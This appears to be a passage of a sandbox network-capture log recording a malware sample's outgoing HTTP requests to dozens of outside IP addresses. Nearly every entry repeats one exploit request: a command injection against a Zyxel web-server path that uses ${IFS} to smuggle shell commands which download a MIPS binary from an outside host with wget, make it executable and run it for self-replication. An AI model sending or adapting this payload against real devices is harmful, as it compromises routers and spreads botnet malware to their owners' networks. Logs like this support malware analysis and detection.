                                                  Jan 19, 2024 18:23:01.524122953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  118192.168.2.135774043.76.198.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.524198055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  119192.168.2.135682894.71.32.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.524247885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  120192.168.2.134805246.233.88.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.524296045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  121192.168.2.1346552131.68.43.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.524327993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  122192.168.2.1342610216.116.230.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.524385929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  123192.168.2.1348058162.19.135.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.524457932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  124192.168.2.13581749.159.46.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.524503946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  125192.168.2.135517296.91.237.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.524602890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  126192.168.2.1348798151.78.17.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.524660110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  127192.168.2.134170063.93.117.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.524764061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  128192.168.2.1355258124.71.211.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.524795055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  129192.168.2.1332910201.2.1.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.524843931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  130192.168.2.1352696223.77.129.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.524929047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  131192.168.2.134174031.186.97.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.524966955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  132192.168.2.1358846187.227.165.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.525142908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  133192.168.2.1336990196.234.59.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.525194883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  134192.168.2.1336098144.162.38.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.525194883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  135192.168.2.1343450160.249.111.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.528651953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  136192.168.2.134217683.153.232.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.528707027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  137192.168.2.1337046210.173.230.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.528774977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  138192.168.2.1339814188.11.206.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.528949976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  139192.168.2.1357070171.126.34.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.528985977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  140192.168.2.1336090203.0.17.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.529042006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  141192.168.2.133905286.189.116.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.529097080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  142192.168.2.1339252108.174.28.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.529190063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  143192.168.2.1354100205.103.193.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.529227972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  144192.168.2.1338592206.161.1.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.529294968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  145192.168.2.1338980179.29.9.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.529383898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  146192.168.2.1334042169.55.92.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.529392958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  147192.168.2.135919227.12.253.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.529437065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  148192.168.2.1337834186.94.87.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.529623985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  149192.168.2.1342878116.199.97.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.529674053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  150192.168.2.1358188149.17.125.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.529735088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  151192.168.2.134202475.198.97.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.529797077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  152192.168.2.133796014.241.231.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.529891014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  153192.168.2.1339760101.152.29.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.529901028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  154192.168.2.1341202195.13.8.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.530006886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  155192.168.2.13395861.32.109.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.530029058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  156192.168.2.1354650151.18.33.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.530086040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  157192.168.2.133682889.105.152.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.530138016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  158192.168.2.1342584206.3.168.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.530738115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  159192.168.2.1356244110.136.0.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.530775070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  160192.168.2.1348530104.198.79.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.530848980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  161192.168.2.1345710209.116.34.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.530880928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  162192.168.2.135261869.166.193.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.531017065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  163192.168.2.1341058103.99.80.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.531060934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  164192.168.2.1338650123.89.59.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.531122923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  165192.168.2.1343558191.147.139.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.531188965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  166192.168.2.1359814178.234.145.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.531272888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  167192.168.2.133438850.204.222.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.531310081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  168192.168.2.1336604186.120.197.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.531363964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  169192.168.2.135053413.156.111.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.531420946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  170192.168.2.135777039.248.151.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.531508923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  171192.168.2.1337012194.153.53.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.531567097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  172192.168.2.133840468.100.249.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.531640053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  173192.168.2.1344164106.134.138.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.531680107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  174192.168.2.1360858218.106.169.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.531708956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  175192.168.2.133821425.59.8.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.531790972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  176192.168.2.135144269.243.173.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.531829119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  177192.168.2.1334438136.85.166.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.531924009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  178192.168.2.1350048162.67.90.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.531970978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  179192.168.2.134729089.208.100.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.532037973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  180192.168.2.1349510122.217.166.186443
                                                  TimestampBytes transferredDirectionData
